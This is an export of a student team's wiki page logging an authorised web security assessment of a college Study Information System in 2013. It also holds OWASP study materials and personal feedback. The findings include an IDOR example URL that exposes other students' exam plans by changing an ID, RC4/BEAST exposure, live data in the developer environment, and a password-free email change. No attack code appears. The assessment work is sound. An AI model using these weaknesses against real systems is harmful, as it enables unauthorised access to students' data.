* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
Our final documentation can be found from Google Drive.&lt;br /&gt;
[https://docs.google.com/document/d/1ACCHfErxIn1U__bfTr1TTRNRRLJM9F2rZZ9dttgjed8/edit|Final Documentation]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;NB! This can be updated in a few hours or so?&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
* &#039;&#039;&#039;What I did like: &#039;&#039;&#039;&lt;br /&gt;
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.&lt;br /&gt;
** Multicultural groups, where all the participants are from different countries.&lt;br /&gt;
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like: &#039;&#039;&lt;br /&gt;
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)&lt;br /&gt;
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in a team on a real-life problem.&lt;br /&gt;
** Practising problem-solving and working as a team.&lt;br /&gt;
** Learned a lot of new stuff.&lt;br /&gt;
** Organisation - well done&lt;br /&gt;
** Had a wonderful team!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** A couple of days short of time - as usual...&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Everything was organized really well.&lt;br /&gt;
** I liked the arranged events like sauna, visiting Skype and Tallinn teletorn.&lt;br /&gt;
** Everything was also free for us except the beer.&lt;br /&gt;
** I met many new interesting people and got to know about their cultures.&lt;br /&gt;
** I got new friends for life.&lt;br /&gt;
** Our project was interesting and i learned new skills.&lt;br /&gt;
** I also liked FREE water, Estonian girls and Americana pizza place.&lt;br /&gt;
** This IP was one of my best experiences ever.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Lack of free time&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** It was nice to meet new people and get new friends from different cultures.&lt;br /&gt;
** Also all the events that was arranged were very funny, specially sauna-event!  &lt;br /&gt;
** Visiting Skype office was something that you don’t get to do everyday!&lt;br /&gt;
** Free food!&lt;br /&gt;
** Everything was well organized and teachers were truly interested about this intensive course!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Accommodation&lt;br /&gt;
** The equipment we used&lt;br /&gt;
** The capabilities and expertise of the professors&lt;br /&gt;
** The overall quality of teaching&lt;br /&gt;
** The expected learning outcomes&lt;br /&gt;
** The activities besides the general course&lt;br /&gt;
** Friendly environment&lt;br /&gt;
** Working in teams. Thanks guys!&lt;br /&gt;
** Free water&lt;br /&gt;
** Tasty food&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** To long working hours&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62417</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62417"/>
		<updated>2013-04-05T08:44:24Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Markus Rintamäki */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
